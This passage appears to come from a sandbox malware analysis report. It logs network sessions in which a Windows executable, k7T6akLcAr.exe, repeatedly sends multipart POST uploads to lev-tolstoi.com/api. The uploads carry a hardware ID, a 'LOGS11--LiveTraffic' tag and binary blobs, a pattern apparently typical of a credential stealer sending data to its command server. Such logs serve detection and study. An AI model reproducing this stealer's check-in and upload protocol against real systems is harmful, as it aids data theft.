    Set-Cookie: PHPSESSID=ma09t73f7pl0jnpq82h2lf9nfl; expires=Wed, 23 Apr 2025 02:27:21 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VoHIqpdiTrynSczIAieAAeDtC%2BRERxzSbctWw07AEmk6gHcllXYvuq2SMhVrNp5lHIdj6cv1L79ilQm%2F1uuOkFKJCh6HVZ6RexubTBAeFe7wwguTIwzf2mDnI1kL7gShw4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f903f402c23efa9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1988&rtt_var=749&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1457085&cwnd=151&unsent_bytes=0&cid=0faf086e2d5c0a81&ts=775&x=0"
2024-12-28 08:40:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-12-28 08:40:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.6 | 49712       | 172.67.157.254 | 443              | 6032 | C:\Users\user\Desktop\k7T6akLcAr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:40:44 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: lev-tolstoi.com
2024-12-28 08:40:44 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-28 08:40:44 UTC | 1121 | IN | HTTP/1.1 200 OK
    Date: Sat, 28 Dec 2024 08:40:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=cno6c2r3ac2lajh6gjh8frdv0a; expires=Wed, 23 Apr 2025 02:27:23 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Vgi0oQJR5tNXHd8mSIH9fdtDt79rAIWItgK3qydiQzzE2niYcFXRqSqXbkpowRhKNP5xkYrLb48nxtyLBJlKjGdbXF4IdpISMXNv96APIM8BE3pB%2BdyPGJ%2BVgfB0OvS5sA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f903f4d0f9d43fd-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1609&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1713615&cwnd=217&unsent_bytes=0&cid=c39e0ea8beee5c94&ts=768&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 74 34 68 76 73 6f 68 50 56 69 65 33 75 38 2f 35 44 41 46 6c 78 62 73 47 32 77 49 4d 45 71 4c 41 4e 57 45 69 4b 50 38 6f 6e 41 75 68 43 54 77 69 69 45 75 56 74 2f 65 2b 48 57 73 62 6b 54 51 53 4b 74 5a 4b 77 39 39 47 4a 64 47 6a 74 4b 4b 37 74 4b 52 55 6a 76 50 4d 76 33 47 55 44 77 63 30 49 76 74 4a 66 4d 44 4e 4c 31 49 37 42 46 6f 43 6b 38 63 68 6b 43 44 77 38 6e 6e 72 4c 63 2f 63 59 67 50 37 49 4e 78 4d 6c 69 49 33 75 4a 31 72 48 30 48 67 6c 33 37 41 69 64 50 5a 41 33 46 58 38 50 64 79 62 2b 73 39 79 78 6e 69 44 43 2b 33 43 46 32 46 73 75 66 37 54 76 33 4c 78 69 57 57 66 30 43 4c 48 5a 41 4a 35 64 48 6e 63 66 4c 6d 4f 47 72 61 54 7a 4c 4d 76 6d 36 58 78 77 4b 77 59 37 74 64 39 67 36 42 35 78 6b 31 54 5a 36 54 32 35 49 6f 30 4f 62 78 38 6e 6e 72 4c 63 2f
                                                                                                                                                                                                                                                                      Data Ascii: t4hvsohPVie3u8/5DAFlxbsG2wIMEqLANWEiKP8onAuhCTwiiEuVt/e+HWsbkTQSKtZKw99GJdGjtKK7tKRUjvPMv3GUDwc0IvtJfMDNL1I7BFoCk8chkCDw8nnrLc/cYgP7INxMliI3uJ1rH0Hgl37AidPZA3FX8Pdyb+s9yxniDC+3CF2Fsuf7Tv3LxiWWf0CLHZAJ5dHncfLmOGraTzLMvm6XxwKwY7td9g6B5xk1TZ6T25Io0Obx8nnrLc/


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      3192.168.2.649718172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:46 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=5A1OQ2ITZ8JFW4J4U7
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 12865
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:46 UTC12865OUTData Raw: 2d 2d 35 41 31 4f 51 32 49 54 5a 38 4a 46 57 34 4a 34 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 41 31 4f 51 32 49 54 5a 38 4a 46 57 34 4a 34 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 41 31 4f 51 32 49 54 5a 38 4a 46 57 34 4a 34 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                                      Data Ascii: --5A1OQ2ITZ8JFW4J4U7Content-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--5A1OQ2ITZ8JFW4J4U7Content-Disposition: form-data; name="pid"2--5A1OQ2ITZ8JFW4J4U7Content-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                                      2024-12-28 08:40:47 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:47 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=317hs11ek3mlbkij38ctgotc7p; expires=Wed, 23 Apr 2025 02:27:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzmBZIHe%2F%2Bu9bTExB9nCtLAc6nx7TDP%2F36IEYnEwiwb6W4rqYsbXFj4CMWvmZaDvkNYevpXpRXeYBKrR3gLhCTH6yvtOWvEN%2Bq1nBdnXj0DI8nAxdvDiPKtY3%2FaT4eWhqJY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f5b0a89423e-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2211&min_rtt=2211&rtt_var=829&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13804&delivery_rate=1319475&cwnd=197&unsent_bytes=0&cid=c09a1e2a7aeda8a7&ts=1006&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                      2024-12-28 08:40:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      4192.168.2.649724172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:48 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=HKGKVS9P
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 15051
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:48 UTC15051OUTData Raw: 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                                                      Data Ascii: --HKGKVS9PContent-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--HKGKVS9PContent-Disposition: form-data; name="pid"2--HKGKVS9PContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HKGKVS9PContent-Di
                                                                                                                                                                                                                                                                      2024-12-28 08:40:49 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:49 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=aet8vm2jpe3kujr0e198nec9kv; expires=Wed, 23 Apr 2025 02:27:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEUKn9nVBS%2FnPIPQnQgSLOd8LX%2BVm93eu5nbNLtrsR5i3OBfzFiCXUM%2B4UGrlAU5fO1XB1RTLihnfHGsjpQssMKze3wiM5GYRMl5o5tqmoQ1RwGCtNQ%2Bh6dxGSwVQ6Qzt5k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f69dfde8c0c-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1982&rtt_var=751&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15980&delivery_rate=1449851&cwnd=206&unsent_bytes=0&cid=43575a31a7050a27&ts=963&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                      2024-12-28 08:40:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      5192.168.2.649734172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:51 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=88L03U2R39
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 19921
  Host: lev-tolstoi.com
2024-12-28 08:40:51 UTC | 15331 | OUT | Data Raw: 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f
  Data Ascii: --88L03U2R39Content-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--88L03U2R39Content-Disposition: form-data; name="pid"3--88L03U2R39Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--88L03U2R39Co
2024-12-28 08:40:51 UTC | 4590 | OUT | Data Raw: 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Data Ascii: ?2+?2+?o?Mp5p_oI
2024-12-28 08:40:52 UTC | 1123 | IN | HTTP/1.1 200 OK
  Date: Sat, 28 Dec 2024 08:40:51 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=anbltkm7j935i8ifg00hli848r; expires=Wed, 23 Apr 2025 02:27:30 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYA9r29yx95OfqEYe6oQVVNuBlBGmXUcdjhbxBCWiE3oJsm9PsL6dYCohM5wtSd89ySgzpLaopGFGe%2FoXCJizRhlQ4RdPpfiofW3KAOz1XWLndPTafozaIsLAaUIRnpW8FY%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f903f78cad242a0-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1745&rtt_var=656&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20874&delivery_rate=1664766&cwnd=225&unsent_bytes=0&cid=363d5f53cbecb6dd&ts=975&x=0"
2024-12-28 08:40:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-28 08:40:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49745 | 172.67.157.254 | 443 | 6032 | C:\Users\user\Desktop\k7T6akLcAr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:40:53 UTC | 276 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=3M7PF216BJCAA9
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1204
  Host: lev-tolstoi.com
2024-12-28 08:40:53 UTC | 1204 | OUT | Data Raw: 2d 2d 33 4d 37 50 46 32 31 36 42 4a 43 41 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 4d 37 50 46 32 31 36 42 4a 43 41 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4d 37 50 46 32 31 36 42 4a 43 41 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 4d
  Data Ascii: --3M7PF216BJCAA9Content-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--3M7PF216BJCAA9Content-Disposition: form-data; name="pid"1--3M7PF216BJCAA9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3M
2024-12-28 08:40:54 UTC | 1129 | IN | HTTP/1.1 200 OK
  Date: Sat, 28 Dec 2024 08:40:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=i8q9ldjh7bl0pvgsoobj1l79bh; expires=Wed, 23 Apr 2025 02:27:33 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzARxalyQOCUu%2Fe0tOJ83LfeJkE1YodUMZZN2phxW571ZDoGKI2j3h4jDpJAnQKVBSHIhG96nbTIEL0tpRV93l5h%2Fct1CGacmnqd5nYYSe2Ka%2FGRKSs%2F%2BLAiKr5qe6Qw6tw%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f903f8938d043bd-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1661&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2116&delivery_rate=1710603&cwnd=190&unsent_bytes=0&cid=d8623edfaebd4960&ts=1146&x=0"
2024-12-28 08:40:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-28 08:40:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49752 | 172.67.157.254 | 443 | 6032 | C:\Users\user\Desktop\k7T6akLcAr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:40:56 UTC | 272 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=BQB73OBF
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 570960
  Host: lev-tolstoi.com
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
  Data Ascii: --BQB73OBFContent-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--BQB73OBFContent-Disposition: form-data; name="pid"1--BQB73OBFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BQB73OBFContent-Di
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: 34 48 5a dd 09 0f 01 58 83 f0 61 05 29 bf 0a 88 86 4a 43 54 5a 36 79 41 88 b3 e2 ea 65 0a d7 8f 57 27 4f 92 8a b7 43 2c c4 0e fd e9 7a 38 6d 34 dc f3 d3 b5 f7 21 c4 f0 31 33 74 ec 04 a3 4d 6e e2 5e 00 cf 4b ee 6c a2 7b f2 d9 0c 85 6b b8 d2 72 5f 0b 56 a0 b5 70 e9 e2 74 c6 48 20 4b e1 39 47 2f 9e b2 91 a0 60 59 d4 85 3b a1 93 dd ec af 02 be 3e a0 df 78 a5 d2 a0 2c 1a b1 69 e1 ba fd 6b c8 a6 65 ab b8 17 4d 39 12 d6 22 57 71 c0 6d 10 52 42 13 30 12 a5 a0 33 d2 f8 58 18 52 80 ed 98 82 cb 64 0b 24 ab 0c 01 e1 f4 5f f3 2d 4b 71 45 e5 68 25 70 31 54 b7 62 fd 75 3f 7d 10 ef 79 9d 39 c3 52 e5 dd e9 db b9 af d3 62 00 9e c6 9c 00 af 57 0b 2a d7 4b a3 15 b4 e5 d4 71 5b 22 9c fd 12 27 86 cb d4 19 14 7d 01 68 93 b0 bd 67 ae d6 10 1f 1e 1d 5e 93 bc ac 18 bf 7d 70 e3 78
  Data Ascii: 4HZXa)JCTZ6yAeW'OC,z8m4!13tMn^Kl{kr_VptH K9G/`Y;>x,ikeM9"WqmRB03XRd$_-KqEh%p1Tbu?}y9RbW*Kq["'}hg^}px
